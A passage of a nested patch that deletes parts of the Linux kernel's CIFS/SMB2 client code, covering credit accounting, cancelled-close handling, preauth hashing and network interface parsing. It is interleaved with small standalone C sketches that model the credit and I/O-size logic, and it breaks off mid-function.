+-	kfree(cancelled);
+-}
+-
+-/*
+- * Caller should already have an extra reference to @tcon.
+- * This function is used to queue work to close a handle to prevent leaks
+- * on the server.
+- * We handle two cases: first, if an open was interrupted after we sent the
+- * SMB2_CREATE to the server but before we processed the reply; and second,
+- * if a close was interrupted before we sent the SMB2_CLOSE to the server.
+- */
+-static int
+-__smb2_handle_cancelled_cmd(struct cifs_tcon *tcon, __u16 cmd, __u64 mid,
+-			    __u64 persistent_fid, __u64 volatile_fid)
+-{
+-	struct close_cancelled_open *cancelled;
+-
+-	cancelled = kzalloc(sizeof(*cancelled), GFP_ATOMIC);
+-	if (!cancelled)
+-		return -ENOMEM;
+-
+-	cancelled->fid.persistent_fid = persistent_fid;
+-	cancelled->fid.volatile_fid = volatile_fid;
+-	cancelled->tcon = tcon;
+-	cancelled->cmd = cmd;
+-	cancelled->mid = mid;
+-	INIT_WORK(&cancelled->work, smb2_cancelled_close_fid);
+-	WARN_ON(queue_work(cifsiod_wq, &cancelled->work) == false);
+-
+-	return 0;
+-}
+-
+-int
+-smb2_handle_cancelled_close(struct cifs_tcon *tcon, __u64 persistent_fid,
+-			    __u64 volatile_fid)
+-{
+-	int rc;
+-
+-	cifs_dbg(FYI, "%s: tc_count=%d\n", __func__, tcon->tc_count);
+-	spin_lock(&cifs_tcp_ses_lock);
+-	if (tcon->tc_count <= 0) {
+-		struct TCP_Server_Info *server = NULL;
+-
+-		WARN_ONCE(tcon->tc_count < 0, "tcon refcount is negative");
+-		spin_unlock(&cifs_tcp_ses_lock);
+-
+-		if (tcon->ses)
+-			server = tcon->ses->server;
+-
+-		cifs_server_dbg(FYI, "tid=0x%x: tcon is closing, skipping async close retry of fid %llu %llu\n",
+-				tcon->tid, persistent_fid, volatile_fid);
+-
+-		return 0;
+-	}
+-	tcon->tc_count++;
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	rc = __smb2_handle_cancelled_cmd(tcon, SMB2_CLOSE_HE, 0,
+-					 persistent_fid, volatile_fid);
+-	if (rc)
+-		cifs_put_tcon(tcon);
+-
+-	return rc;
+-}
+-
+-int
+-smb2_handle_cancelled_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *hdr = mid->resp_buf;
+-	struct smb2_create_rsp *rsp = mid->resp_buf;
+-	struct cifs_tcon *tcon;
+-	int rc;
+-
+-	if ((mid->optype & CIFS_CP_CREATE_CLOSE_OP) || hdr->Command != SMB2_CREATE ||
+-	    hdr->Status != STATUS_SUCCESS)
+-		return 0;
+-
+-	tcon = smb2_find_smb_tcon(server, le64_to_cpu(hdr->SessionId),
+-				  le32_to_cpu(hdr->Id.SyncId.TreeId));
+-	if (!tcon)
+-		return -ENOENT;
+-
+-	rc = __smb2_handle_cancelled_cmd(tcon,
+-					 le16_to_cpu(hdr->Command),
+-					 le64_to_cpu(hdr->MessageId),
+-					 rsp->PersistentFileId,
+-					 rsp->VolatileFileId);
+-	if (rc)
+-		cifs_put_tcon(tcon);
+-
+-	return rc;
+-}
+-
+-/**
+- * smb311_update_preauth_hash - update @ses hash with the packet data in @iov
+- *
+- * Assumes @iov does not contain the rfc1002 length and iov[0] has the
+- * SMB2 header.
+- *
+- * @ses:	server session structure
+- * @server:	pointer to server info
+- * @iov:	array containing the SMB request we will send to the server
+- * @nvec:	number of array entries for the iov
+- */
+-int
+-smb311_update_preauth_hash(struct cifs_ses *ses, struct TCP_Server_Info *server,
+-			   struct kvec *iov, int nvec)
+-{
+-	int i, rc;
+-	struct smb2_hdr *hdr;
+-	struct shash_desc *sha512 = NULL;
+-
+-	hdr = (struct smb2_hdr *)iov[0].iov_base;
+-	/* neg prot are always taken */
+-	if (hdr->Command == SMB2_NEGOTIATE)
+-		goto ok;
+-
+-	/*
+-	 * If we process a command which wasn't a negprot, it means the
+-	 * neg prot was already done, so the server dialect was set
+-	 * and we can test it. Preauth requires 3.1.1 for now.
+-	 */
+-	if (server->dialect != SMB311_PROT_ID)
+-		return 0;
+-
+-	if (hdr->Command != SMB2_SESSION_SETUP)
+-		return 0;
+-
+-	/* skip last sess setup response */
+-	if ((hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
+-	    && (hdr->Status == NT_STATUS_OK
+-		|| (hdr->Status !=
+-		    cpu_to_le32(NT_STATUS_MORE_PROCESSING_REQUIRED))))
+-		return 0;
+-
+-ok:
+-	rc = smb311_crypto_shash_allocate(server);
+-	if (rc)
+-		return rc;
+-
+-	sha512 = server->secmech.sha512;
+-	rc = crypto_shash_init(sha512);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init sha512 shash\n", __func__);
+-		return rc;
+-	}
+-
+-	rc = crypto_shash_update(sha512, ses->preauth_sha_hash,
+-				 SMB2_PREAUTH_HASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update sha512 shash\n", __func__);
+-		return rc;
+-	}
+-
+-	for (i = 0; i < nvec; i++) {
+-		rc = crypto_shash_update(sha512, iov[i].iov_base, iov[i].iov_len);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update sha512 shash\n",
+-				 __func__);
+-			return rc;
+-		}
+-	}
+-
+-	rc = crypto_shash_final(sha512, ses->preauth_sha_hash);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not finalize sha512 shash\n",
+-			 __func__);
+-		return rc;
+-	}
+-
+-	return 0;
+-}
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+deleted file mode 100644
+index d512440d35b6f..0000000000000
+--- a/fs/cifs/smb2ops.c
++++ /dev/null
+@@ -1,5805 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *  SMB2 version specific operations
+- *
+- *  Copyright (c) 2012, Jeff Layton <jlayton@redhat.com>
+- */
+-
+-#include <linux/pagemap.h>
+-#include <linux/vfs.h>
+-#include <linux/falloc.h>
+-#include <linux/scatterlist.h>
+-#include <linux/uuid.h>
+-#include <linux/sort.h>
+-#include <crypto/aead.h>
+-#include <linux/fiemap.h>
+-#include <uapi/linux/magic.h>
+-#include "cifsfs.h"
+-#include "cifsglob.h"
+-#include "smb2pdu.h"
+-#include "smb2proto.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-#include "cifs_ioctl.h"
+-#include "smbdirect.h"
+-#include "fscache.h"
+-#include "fs_context.h"
+-#include "cached_dir.h"
+-
+-/* Change credits for different ops and return the total number of credits */
+-static int
+-change_conf(struct TCP_Server_Info *server)
+-{
+-	server->credits += server->echo_credits + server->oplock_credits;
+-	server->oplock_credits = server->echo_credits = 0;
+-	switch (server->credits) {
+-	case 0:
+-		return 0;
+-	case 1:
+-		server->echoes = false;
+-		server->oplocks = false;
+-		break;
+-	case 2:
+-		server->echoes = true;
+-		server->oplocks = false;
+-		server->echo_credits = 1;
+-		break;
+-	default:
+-		server->echoes = true;
+-		if (enable_oplocks) {
+-			server->oplocks = true;
+-			server->oplock_credits = 1;
+-		} else
+-			server->oplocks = false;
+-
+-		server->echo_credits = 1;
+-	}
+-	server->credits -= server->echo_credits + server->oplock_credits;
+-	return server->credits + server->echo_credits + server->oplock_credits;
+-}
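/*
 * Illustrative sketch (not part of the patch): change_conf() above pools
 * the echo and oplock credits back into the main pot and re-splits them.
 * This standalone model reproduces that policy so the thresholds are easy
 * to see: 0 credits disables everything, 1 keeps only regular requests,
 * 2 restores echoes, and 3+ restores oplocks too (when enabled).
 */
#include <stdbool.h>
#include <stdio.h>

struct model {
	int credits, echo_credits, oplock_credits;
	bool echoes, oplocks;
};

static int rebalance(struct model *s, bool enable_oplocks)
{
	s->credits += s->echo_credits + s->oplock_credits;
	s->oplock_credits = s->echo_credits = 0;
	switch (s->credits) {
	case 0:
		return 0;
	case 1:
		s->echoes = s->oplocks = false;
		break;
	case 2:
		s->echoes = true;
		s->oplocks = false;
		s->echo_credits = 1;
		break;
	default:
		s->echoes = true;
		s->oplocks = enable_oplocks;
		if (enable_oplocks)
			s->oplock_credits = 1;
		s->echo_credits = 1;
	}
	s->credits -= s->echo_credits + s->oplock_credits;
	return s->credits + s->echo_credits + s->oplock_credits;
}

int main(void)
{
	struct model s = { .credits = 3 };
	int total = rebalance(&s, true);

	/* prints: total=3 echoes=1 oplocks=1 regular=1 */
	printf("total=%d echoes=%d oplocks=%d regular=%d\n",
	       total, s.echoes, s.oplocks, s.credits);
	return 0;
}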
+-
+-static void
+-smb2_add_credits(struct TCP_Server_Info *server,
+-		 const struct cifs_credits *credits, const int optype)
+-{
+-	int *val, rc = -1;
+-	int scredits, in_flight;
+-	unsigned int add = credits->value;
+-	unsigned int instance = credits->instance;
+-	bool reconnect_detected = false;
+-	bool reconnect_with_invalid_credits = false;
+-
+-	spin_lock(&server->req_lock);
+-	val = server->ops->get_credits_field(server, optype);
+-
+-	/* eg found case where write overlapping reconnect messed up credits */
+-	if (((optype & CIFS_OP_MASK) == CIFS_NEG_OP) && (*val != 0))
+-		reconnect_with_invalid_credits = true;
+-
+-	if ((instance == 0) || (instance == server->reconnect_instance))
+-		*val += add;
+-	else
+-		reconnect_detected = true;
+-
+-	if (*val > 65000) {
+-		*val = 65000; /* Don't get near 64K credits, avoid srv bugs */
+-		pr_warn_once("server overflowed SMB3 credits\n");
+-		trace_smb3_overflow_credits(server->CurrentMid,
+-					    server->conn_id, server->hostname, *val,
+-					    add, server->in_flight);
+-	}
+-	server->in_flight--;
+-	if (server->in_flight == 0 &&
+-	   ((optype & CIFS_OP_MASK) != CIFS_NEG_OP) &&
+-	   ((optype & CIFS_OP_MASK) != CIFS_SESS_OP))
+-		rc = change_conf(server);
+-	/*
+-	 * Sometimes server returns 0 credits on oplock break ack - we need to
+-	 * rebalance credits in this case.
+-	 */
+-	else if (server->in_flight > 0 && server->oplock_credits == 0 &&
+-		 server->oplocks) {
+-		if (server->credits > 1) {
+-			server->credits--;
+-			server->oplock_credits++;
+-		}
+-	}
+-	scredits = *val;
+-	in_flight = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-	wake_up(&server->request_q);
+-
+-	if (reconnect_detected) {
+-		trace_smb3_reconnect_detected(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, add, in_flight);
+-
+-		cifs_dbg(FYI, "trying to put %d credits from the old server instance %d\n",
+-			 add, instance);
+-	}
+-
+-	if (reconnect_with_invalid_credits) {
+-		trace_smb3_reconnect_with_invalid_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, add, in_flight);
+-		cifs_dbg(FYI, "Negotiate operation when server credits is non-zero. Optype: %d, server credits: %d, credits added: %d\n",
+-			 optype, scredits, add);
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedReconnect
+-	    || server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	switch (rc) {
+-	case -1:
+-		/* change_conf hasn't been executed */
+-		break;
+-	case 0:
+-		cifs_server_dbg(VFS, "Possible client or server bug - zero credits\n");
+-		break;
+-	case 1:
+-		cifs_server_dbg(VFS, "disabling echoes and oplocks\n");
+-		break;
+-	case 2:
+-		cifs_dbg(FYI, "disabling oplocks\n");
+-		break;
+-	default:
+-		/* change_conf rebalanced credits for different types */
+-		break;
+-	}
+-
+-	trace_smb3_add_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, add, in_flight);
+-	cifs_dbg(FYI, "%s: added %u credits total=%d\n", __func__, add, scredits);
+-}
+-
+-static void
+-smb2_set_credits(struct TCP_Server_Info *server, const int val)
+-{
+-	int scredits, in_flight;
+-
+-	spin_lock(&server->req_lock);
+-	server->credits = val;
+-	if (val == 1)
+-		server->reconnect_instance++;
+-	scredits = server->credits;
+-	in_flight = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-
+-	trace_smb3_set_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, val, in_flight);
+-	cifs_dbg(FYI, "%s: set %u credits\n", __func__, val);
+-
+-	/* don't log while holding the lock */
+-	if (val == 1)
+-		cifs_dbg(FYI, "set credits to 1 due to smb2 reconnect\n");
+-}
+-
+-static int *
+-smb2_get_credits_field(struct TCP_Server_Info *server, const int optype)
+-{
+-	switch (optype) {
+-	case CIFS_ECHO_OP:
+-		return &server->echo_credits;
+-	case CIFS_OBREAK_OP:
+-		return &server->oplock_credits;
+-	default:
+-		return &server->credits;
+-	}
+-}
+-
+-static unsigned int
+-smb2_get_credits(struct mid_q_entry *mid)
+-{
+-	return mid->credits_received;
+-}
+-
+-static int
+-smb2_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
+-		      unsigned int *num, struct cifs_credits *credits)
+-{
+-	int rc = 0;
+-	unsigned int scredits, in_flight;
+-
+-	spin_lock(&server->req_lock);
+-	while (1) {
+-		if (server->credits <= 0) {
+-			spin_unlock(&server->req_lock);
+-			cifs_num_waiters_inc(server);
+-			rc = wait_event_killable(server->request_q,
+-				has_credits(server, &server->credits, 1));
+-			cifs_num_waiters_dec(server);
+-			if (rc)
+-				return rc;
+-			spin_lock(&server->req_lock);
+-		} else {
+-			spin_unlock(&server->req_lock);
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus == CifsExiting) {
+-				spin_unlock(&server->srv_lock);
+-				return -ENOENT;
+-			}
+-			spin_unlock(&server->srv_lock);
+-
+-			spin_lock(&server->req_lock);
+-			scredits = server->credits;
+-			/* can deadlock with reopen */
+-			if (scredits <= 8) {
+-				*num = SMB2_MAX_BUFFER_SIZE;
+-				credits->value = 0;
+-				credits->instance = 0;
+-				break;
+-			}
+-
+-			/* leave some credits for reopen and other ops */
+-			scredits -= 8;
+-			*num = min_t(unsigned int, size,
+-				     scredits * SMB2_MAX_BUFFER_SIZE);
+-
+-			credits->value =
+-				DIV_ROUND_UP(*num, SMB2_MAX_BUFFER_SIZE);
+-			credits->instance = server->reconnect_instance;
+-			server->credits -= credits->value;
+-			server->in_flight++;
+-			if (server->in_flight > server->max_in_flight)
+-				server->max_in_flight = server->in_flight;
+-			break;
+-		}
+-	}
+-	scredits = server->credits;
+-	in_flight = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-
+-	trace_smb3_wait_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, -(credits->value), in_flight);
+-	cifs_dbg(FYI, "%s: removed %u credits total=%d\n",
+-			__func__, credits->value, scredits);
+-
+-	return rc;
+-}
+-
+-static int
+-smb2_adjust_credits(struct TCP_Server_Info *server,
+-		    struct cifs_credits *credits,
+-		    const unsigned int payload_size)
+-{
+-	int new_val = DIV_ROUND_UP(payload_size, SMB2_MAX_BUFFER_SIZE);
+-	int scredits, in_flight;
+-
+-	if (!credits->value || credits->value == new_val)
+-		return 0;
+-
+-	if (credits->value < new_val) {
+-		trace_smb3_too_many_credits(server->CurrentMid,
+-				server->conn_id, server->hostname, 0, credits->value - new_val, 0);
+-		cifs_server_dbg(VFS, "request has less credits (%d) than required (%d)",
+-				credits->value, new_val);
+-
+-		return -ENOTSUPP;
+-	}
+-
+-	spin_lock(&server->req_lock);
+-
+-	if (server->reconnect_instance != credits->instance) {
+-		scredits = server->credits;
+-		in_flight = server->in_flight;
+-		spin_unlock(&server->req_lock);
+-
+-		trace_smb3_reconnect_detected(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits,
+-			credits->value - new_val, in_flight);
+-		cifs_server_dbg(VFS, "trying to return %d credits to old session\n",
+-			 credits->value - new_val);
+-		return -EAGAIN;
+-	}
+-
+-	server->credits += credits->value - new_val;
+-	scredits = server->credits;
+-	in_flight = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-	wake_up(&server->request_q);
+-
+-	trace_smb3_adj_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits,
+-			credits->value - new_val, in_flight);
+-	cifs_dbg(FYI, "%s: adjust added %u credits total=%d\n",
+-			__func__, credits->value - new_val, scredits);
+-
+-	credits->value = new_val;
+-
+-	return 0;
+-}
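/*
 * Illustrative sketch (not part of the patch): large reads and writes
 * consume one credit per 64 KiB of payload, which is the rounding that
 * smb2_wait_mtu_credits() and smb2_adjust_credits() above both rely on.
 * SMB2_MAX_BUFFER_SIZE is assumed to be 65536 bytes here.
 */
#include <stdio.h>

#define SMB2_MAX_BUFFER_SIZE 65536u
#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))

int main(void)
{
	unsigned int payloads[] = { 1, 65536, 65537, 1048576 };
	size_t i;

	/* prints 1, 1, 2 and 16 credits respectively */
	for (i = 0; i < sizeof(payloads) / sizeof(payloads[0]); i++)
		printf("payload %7u bytes -> %u credit(s)\n", payloads[i],
		       DIV_ROUND_UP(payloads[i], SMB2_MAX_BUFFER_SIZE));
	return 0;
}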
+-
+-static __u64
+-smb2_get_next_mid(struct TCP_Server_Info *server)
+-{
+-	__u64 mid;
+-	/* for SMB2 we need the current value */
+-	spin_lock(&server->mid_lock);
+-	mid = server->CurrentMid++;
+-	spin_unlock(&server->mid_lock);
+-	return mid;
+-}
+-
+-static void
+-smb2_revert_current_mid(struct TCP_Server_Info *server, const unsigned int val)
+-{
+-	spin_lock(&server->mid_lock);
+-	if (server->CurrentMid >= val)
+-		server->CurrentMid -= val;
+-	spin_unlock(&server->mid_lock);
+-}
+-
+-static struct mid_q_entry *
+-__smb2_find_mid(struct TCP_Server_Info *server, char *buf, bool dequeue)
+-{
+-	struct mid_q_entry *mid;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	__u64 wire_mid = le64_to_cpu(shdr->MessageId);
+-
+-	if (shdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
+-		cifs_server_dbg(VFS, "Encrypted frame parsing not supported yet\n");
+-		return NULL;
+-	}
+-
+-	spin_lock(&server->mid_lock);
+-	list_for_each_entry(mid, &server->pending_mid_q, qhead) {
+-		if ((mid->mid == wire_mid) &&
+-		    (mid->mid_state == MID_REQUEST_SUBMITTED) &&
+-		    (mid->command == shdr->Command)) {
+-			kref_get(&mid->refcount);
+-			if (dequeue) {
+-				list_del_init(&mid->qhead);
+-				mid->mid_flags |= MID_DELETED;
+-			}
+-			spin_unlock(&server->mid_lock);
+-			return mid;
+-		}
+-	}
+-	spin_unlock(&server->mid_lock);
+-	return NULL;
+-}
+-
+-static struct mid_q_entry *
+-smb2_find_mid(struct TCP_Server_Info *server, char *buf)
+-{
+-	return __smb2_find_mid(server, buf, false);
+-}
+-
+-static struct mid_q_entry *
+-smb2_find_dequeue_mid(struct TCP_Server_Info *server, char *buf)
+-{
+-	return __smb2_find_mid(server, buf, true);
+-}
+-
+-static void
+-smb2_dump_detail(void *buf, struct TCP_Server_Info *server)
+-{
+-#ifdef CONFIG_CIFS_DEBUG2
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-
+-	cifs_server_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Mid: %llu Pid: %d\n",
+-		 shdr->Command, shdr->Status, shdr->Flags, shdr->MessageId,
+-		 shdr->Id.SyncId.ProcessId);
+-	cifs_server_dbg(VFS, "smb buf %p len %u\n", buf,
+-		 server->ops->calc_smb_size(buf));
+-#endif
+-}
+-
+-static bool
+-smb2_need_neg(struct TCP_Server_Info *server)
+-{
+-	return server->max_read == 0;
+-}
+-
+-static int
+-smb2_negotiate(const unsigned int xid,
+-	       struct cifs_ses *ses,
+-	       struct TCP_Server_Info *server)
+-{
+-	int rc;
+-
+-	spin_lock(&server->mid_lock);
+-	server->CurrentMid = 0;
+-	spin_unlock(&server->mid_lock);
+-	rc = SMB2_negotiate(xid, ses, server);
+-	/* BB we probably don't need to retry with modern servers */
+-	if (rc == -EAGAIN)
+-		rc = -EHOSTDOWN;
+-	return rc;
+-}
+-
+-static unsigned int
+-smb2_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int wsize;
+-
+-	/* start with specified wsize, or default */
+-	wsize = ctx->wsize ? ctx->wsize : CIFS_DEFAULT_IOSIZE;
+-	wsize = min_t(unsigned int, wsize, server->max_write);
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		wsize = min_t(unsigned int, wsize, SMB2_MAX_BUFFER_SIZE);
+-
+-	return wsize;
+-}
+-
+-static unsigned int
+-smb3_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int wsize;
+-
+-	/* start with specified wsize, or default */
+-	wsize = ctx->wsize ? ctx->wsize : SMB3_DEFAULT_IOSIZE;
+-	wsize = min_t(unsigned int, wsize, server->max_write);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (server->rdma) {
+-		if (server->sign)
+-			/*
+-			 * Account for SMB2 data transfer packet header and
+-			 * possible encryption header
+-			 */
+-			wsize = min_t(unsigned int,
+-				wsize,
+-				server->smbd_conn->max_fragmented_send_size -
+-					SMB2_READWRITE_PDU_HEADER_SIZE -
+-					sizeof(struct smb2_transform_hdr));
+-		else
+-			wsize = min_t(unsigned int,
+-				wsize, server->smbd_conn->max_readwrite_size);
+-	}
+-#endif
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		wsize = min_t(unsigned int, wsize, SMB2_MAX_BUFFER_SIZE);
+-
+-	return wsize;
+-}
+-
+-static unsigned int
+-smb2_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int rsize;
+-
+-	/* start with specified rsize, or default */
+-	rsize = ctx->rsize ? ctx->rsize : CIFS_DEFAULT_IOSIZE;
+-	rsize = min_t(unsigned int, rsize, server->max_read);
+-
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		rsize = min_t(unsigned int, rsize, SMB2_MAX_BUFFER_SIZE);
+-
+-	return rsize;
+-}
+-
+-static unsigned int
+-smb3_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int rsize;
+-
+-	/* start with specified rsize, or default */
+-	rsize = ctx->rsize ? ctx->rsize : SMB3_DEFAULT_IOSIZE;
+-	rsize = min_t(unsigned int, rsize, server->max_read);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (server->rdma) {
+-		if (server->sign)
+-			/*
+-			 * Account for SMB2 data transfer packet header and
+-			 * possible encryption header
+-			 */
+-			rsize = min_t(unsigned int,
+-				rsize,
+-				server->smbd_conn->max_fragmented_recv_size -
+-					SMB2_READWRITE_PDU_HEADER_SIZE -
+-					sizeof(struct smb2_transform_hdr));
+-		else
+-			rsize = min_t(unsigned int,
+-				rsize, server->smbd_conn->max_readwrite_size);
+-	}
+-#endif
+-
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		rsize = min_t(unsigned int, rsize, SMB2_MAX_BUFFER_SIZE);
+-
+-	return rsize;
+-}
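/*
 * Illustrative sketch (not part of the patch): the negotiate_wsize/rsize
 * helpers above clamp the mount-requested I/O size first to the server's
 * advertised maximum and then to 64 KiB when the connection lacks the
 * large-MTU capability. The sizes below are assumptions chosen so each
 * clamp fires once.
 */
#include <stdio.h>

#define SMB2_MAX_BUFFER_SIZE 65536u

static unsigned int negotiate_iosize(unsigned int requested,
				     unsigned int server_max,
				     int large_mtu)
{
	unsigned int size = requested;

	if (size > server_max)
		size = server_max;          /* server-imposed ceiling */
	if (!large_mtu && size > SMB2_MAX_BUFFER_SIZE)
		size = SMB2_MAX_BUFFER_SIZE; /* no multi-credit requests */
	return size;
}

int main(void)
{
	/* 4 MiB requested, 1 MiB server max, large MTU -> 1048576 */
	printf("%u\n", negotiate_iosize(4194304, 1048576, 1));
	/* same request without large MTU -> clamped to 65536 */
	printf("%u\n", negotiate_iosize(4194304, 1048576, 0));
	return 0;
}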
+-
+-static int
+-parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+-			size_t buf_len, struct cifs_ses *ses, bool in_mount)
+-{
+-	struct network_interface_info_ioctl_rsp *p;
+-	struct sockaddr_in *addr4;
+-	struct sockaddr_in6 *addr6;
+-	struct iface_info_ipv4 *p4;
+-	struct iface_info_ipv6 *p6;
+-	struct cifs_server_iface *info = NULL, *iface = NULL, *niface = NULL;
+-	struct cifs_server_iface tmp_iface;
+-	ssize_t bytes_left;
+-	size_t next = 0;
+-	int nb_iface = 0;
+-	int rc = 0, ret = 0;
+-
+-	bytes_left = buf_len;
+-	p = buf;
+-
+-	spin_lock(&ses->iface_lock);
+-	/* do not query too frequently, this time with lock held */
+-	if (ses->iface_last_update &&
+-	    time_before(jiffies, ses->iface_last_update +
+-			(SMB_INTERFACE_POLL_INTERVAL * HZ))) {
+-		spin_unlock(&ses->iface_lock);
+-		return 0;
+-	}
+-
+-	/*
+-	 * Go through iface_list and do kref_put to remove
+-	 * any unused ifaces. ifaces in use will be removed
+-	 * when the last user calls a kref_put on it
+-	 */
+-	list_for_each_entry_safe(iface, niface, &ses->iface_list,
+-				 iface_head) {
+-		iface->is_active = 0;
+-		kref_put(&iface->refcount, release_iface);
+-		ses->iface_count--;
+-	}
+-	spin_unlock(&ses->iface_lock);
+-
+-	/*
+-	 * A server (e.g. Samba) can return an empty interface list in some cases,
+-	 * which would only be a problem if we were requesting multichannel
+-	 */
+-	if (bytes_left == 0) {
+-		/* avoid spamming logs every 10 minutes, so log only in mount */
+-		if ((ses->chan_max > 1) && in_mount)
+-			cifs_dbg(VFS,
+-				 "multichannel not available\n"
+-				 "Empty network interface list returned by server %s\n",
+-				 ses->server->hostname);
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	while (bytes_left >= sizeof(*p)) {
+-		memset(&tmp_iface, 0, sizeof(tmp_iface));
+-		tmp_iface.speed = le64_to_cpu(p->LinkSpeed);
+-		tmp_iface.rdma_capable = le32_to_cpu(p->Capability & RDMA_CAPABLE) ? 1 : 0;
+-		tmp_iface.rss_capable = le32_to_cpu(p->Capability & RSS_CAPABLE) ? 1 : 0;
+-
+-		switch (p->Family) {
+-		/*
+-		 * The kernel and wire socket structures have the same
+-		 * layout and use network byte order but make the
+-		 * conversion explicit in case either one changes.
+-		 */
+-		case INTERNETWORK:
+-			addr4 = (struct sockaddr_in *)&tmp_iface.sockaddr;
+-			p4 = (struct iface_info_ipv4 *)p->Buffer;
+-			addr4->sin_family = AF_INET;
+-			memcpy(&addr4->sin_addr, &p4->IPv4Address, 4);
+-
+-			/* [MS-SMB2] 2.2.32.5.1.1 Clients MUST ignore these */
+-			addr4->sin_port = cpu_to_be16(CIFS_PORT);
+-
+-			cifs_dbg(FYI, "%s: ipv4 %pI4\n", __func__,
+-				 &addr4->sin_addr);
+-			break;
+-		case INTERNETWORKV6:
+-			addr6 =	(struct sockaddr_in6 *)&tmp_iface.sockaddr;
+-			p6 = (struct iface_info_ipv6 *)p->Buffer;
+-			addr6->sin6_family = AF_INET6;
+-			memcpy(&addr6->sin6_addr, &p6->IPv6Address, 16);
+-
+-			/* [MS-SMB2] 2.2.32.5.1.2 Clients MUST ignore these */
+-			addr6->sin6_flowinfo = 0;
+-			addr6->sin6_scope_id = 0;
+-			addr6->sin6_port = cpu_to_be16(CIFS_PORT);
+-
+-			cifs_dbg(FYI, "%s: ipv6 %pI6\n", __func__,
+-				 &addr6->sin6_addr);
+-			break;
+-		default:
+-			cifs_dbg(VFS,
+-				 "%s: skipping unsupported socket family\n",
+-				 __func__);
+-			goto next_iface;
+-		}
+-
+-		/*
+-		 * The iface_list is assumed to be sorted by speed.
+-		 * Check if the new interface exists in that list.
+-		 * NEVER change iface. it could be in use.
+-		 * Add a new one instead
+-		 */
+-		spin_lock(&ses->iface_lock);
+-		iface = niface = NULL;
+-		list_for_each_entry_safe(iface, niface, &ses->iface_list,
+-					 iface_head) {
+-			ret = iface_cmp(iface, &tmp_iface);
+-			if (!ret) {
+-				/* just get a ref so that it doesn't get picked/freed */
+-				iface->is_active = 1;
+-				kref_get(&iface->refcount);
+-				ses->iface_count++;
+-				spin_unlock(&ses->iface_lock);
+-				goto next_iface;
+-			} else if (ret < 0) {
+-				/* all remaining ifaces are slower */
+-				kref_get(&iface->refcount);
+-				break;
+-			}
+-		}
+-		spin_unlock(&ses->iface_lock);
+-
+-		/* no match. insert the entry in the list */
+-		info = kmalloc(sizeof(struct cifs_server_iface),
+-			       GFP_KERNEL);
+-		if (!info) {
+-			rc = -ENOMEM;
+-			goto out;
+-		}
+-		memcpy(info, &tmp_iface, sizeof(tmp_iface));
+-
+-		/* add this new entry to the list */
+-		kref_init(&info->refcount);
+-		info->is_active = 1;
+-
+-		cifs_dbg(FYI, "%s: adding iface %zu\n", __func__, ses->iface_count);
+-		cifs_dbg(FYI, "%s: speed %zu bps\n", __func__, info->speed);
+-		cifs_dbg(FYI, "%s: capabilities 0x%08x\n", __func__,
+-			 le32_to_cpu(p->Capability));
+-
+-		spin_lock(&ses->iface_lock);
+-		if (!list_entry_is_head(iface, &ses->iface_list, iface_head)) {
+-			list_add_tail(&info->iface_head, &iface->iface_head);
+-			kref_put(&iface->refcount, release_iface);
+-		} else
+-			list_add_tail(&info->iface_head, &ses->iface_list);
+-
+-		ses->iface_count++;
+-		spin_unlock(&ses->iface_lock);
+-		ses->iface_last_update = jiffies;
+-next_iface:
+-		nb_iface++;
+-		next = le32_to_cpu(p->Next);
+-		if (!next) {
+-			bytes_left -= sizeof(*p);
+-			break;
+-		}
